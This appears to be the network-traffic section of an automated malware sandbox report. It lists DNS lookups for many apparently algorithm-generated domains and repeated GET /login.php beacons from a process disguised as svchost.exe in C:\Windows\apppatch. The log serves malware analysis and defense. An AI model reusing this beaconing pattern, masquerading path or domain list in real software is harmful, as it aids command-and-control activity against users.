                                                                                                                                                                                                            Nov 11, 2024 18:25:54.210999012 CET1.1.1.1192.168.2.100xf310No error (0)gahyqah.com23.253.46.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.220237017 CET1.1.1.1192.168.2.100xf3bcName error (3)pujyjav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.229105949 CET1.1.1.1192.168.2.100xe866Name error (3)lyryfyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.234344959 CET1.1.1.1192.168.2.100xe37Name error (3)lyxylux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.326090097 CET1.1.1.1192.168.2.100x4f50No error (0)galyqaz.com199.191.50.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.394615889 CET1.1.1.1192.168.2.100xa6d9No error (0)vocyzit.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.398926020 CET1.1.1.1192.168.2.100x30bcNo error (0)vonypom.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.429943085 CET1.1.1.1192.168.2.100xd833No error (0)lyvyxor.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.457834005 CET1.1.1.1192.168.2.100xcb45No error (0)vojyqem.com77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.457834005 CET1.1.1.1192.168.2.100xcb45No error (0)77980.bodis.com199.59.243.227A (IP address)IN (0x0001)false

                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                            • www.google.comuser-agent:
                                                                                                                                                                                                              • puzylyp.com
                                                                                                                                                                                                              • qegyhig.com
                                                                                                                                                                                                              • lysyvan.com
                                                                                                                                                                                                              • vonypom.com
                                                                                                                                                                                                              • vojyqem.com
                                                                                                                                                                                                              • lymyxid.com
                                                                                                                                                                                                              • gahyqah.com
                                                                                                                                                                                                              • lyvyxor.com
                                                                                                                                                                                                              • qetyfuv.com
                                                                                                                                                                                                              • vocyzit.com
                                                                                                                                                                                                              • galyqaz.com
                                                                                                                                                                                                              • gadyniw.com
                                                                                                                                                                                                              • gatyfus.com
                                                                                                                                                                                                              • pupydeq.com
                                                                                                                                                                                                              • pupycag.com
                                                                                                                                                                                                              • lygynud.com
                                                                                                                                                                                                              • lyrysor.com
                                                                                                                                                                                                              • 106.15.232.163:8000
                                                                                                                                                                                                              • qexyhuv.com
                                                                                                                                                                                                              • lyxynyx.com
                                                                                                                                                                                                              • vofycot.com
                                                                                                                                                                                                              • galynuh.com
                                                                                                                                                                                                              • qegyval.com
                                                                                                                                                                                                              • gadyciz.com
                                                                                                                                                                                                              • ww25.lyxynyx.com
                                                                                                                                                                                                              • ww16.vofycot.com
                                                                                                                                                                                                              • qetyhyg.com
                                                                                                                                                                                                              • gatyhub.com
                                                                                                                                                                                                              • lygyvuj.com
                                                                                                                                                                                                              • gahyhiz.com

                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.104972318.208.156.248807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.220968962 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vonypom.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.653403997 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=73fb4c4f51e49a06ee72b15e3b9b9bd0|66.23.206.109|1731345869|1731345869|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.1049724199.59.243.227807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.502866983 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.924185991 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:24:28 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1094
                                                                                                                                                                                                            x-request-id: 56c592c3-0730-4a19-aac9-be9b7f376588
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                            set-cookie: parking_session=56c592c3-0730-4a19-aac9-be9b7f376588; expires=Mon, 11 Nov 2024 17:39:29 GMT; path=/
                                                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.924381018 CET528INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                            Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTZjNTkyYzMtMDczMC00YTE5LWFhYzktYmU5YjdmMzc2NTg4IiwicGFnZV90aW1lIjoxNzMxMzQ1ODY5LCJwYWdlX3VybCI6I


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.10497253.94.10.34807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.511807919 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lymyxid.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.956121922 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=ff5bdea898dd26690aa630aa00e0226b|66.23.206.109|1731345869|1731345869|0|1|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.1049726188.114.96.3807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.512022972 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.252443075 CET968INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tgW4Frr7v%2B4YMYK4qmXIjyYcjhbZzgMTnB%2BbZcez0Yv2iX6q0JO6G6siDa%2BuaCZbjE8gwivUmQLd5xNmi8Jc40eVkOWGWLqOycMggBXhh5e0W1xqOzI2tEPIw8Zo4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ff9e6ed6c0ca2-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1299&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.926940918 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:32.262435913 CET811INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:32 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TgKreQzuXWX4vjdvSRfMhp%2BJGQuhMcweijgyQy%2FKVAFdHaiucC%2B%2F%2Bh6CJkf6Sh6stO9UhpHd8oeQC466XCXGg6nvOUZNmXMuvqbWGL%2BqPFKwvQx3lZSR%2F0e83h248A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ff9f3cd5b0ca2-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1286&sent=4&recv=6&lost=0&retrans=0&sent_bytes=968&recv_bytes=486&delivery_rate=2170914&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Nov 11, 2024 18:24:32.263781071 CET173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.104972723.253.46.64807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.717277050 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.172508001 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:24 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.172575951 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.104972899.83.170.3807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.811451912 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.235766888 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://puzylyp.com/login.php
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:30 GMT
                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.1049734208.100.26.245807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.024241924 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.468175888 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.469310999 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.572403908 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.104973544.221.84.105807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.029185057 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyfuv.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.454983950 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
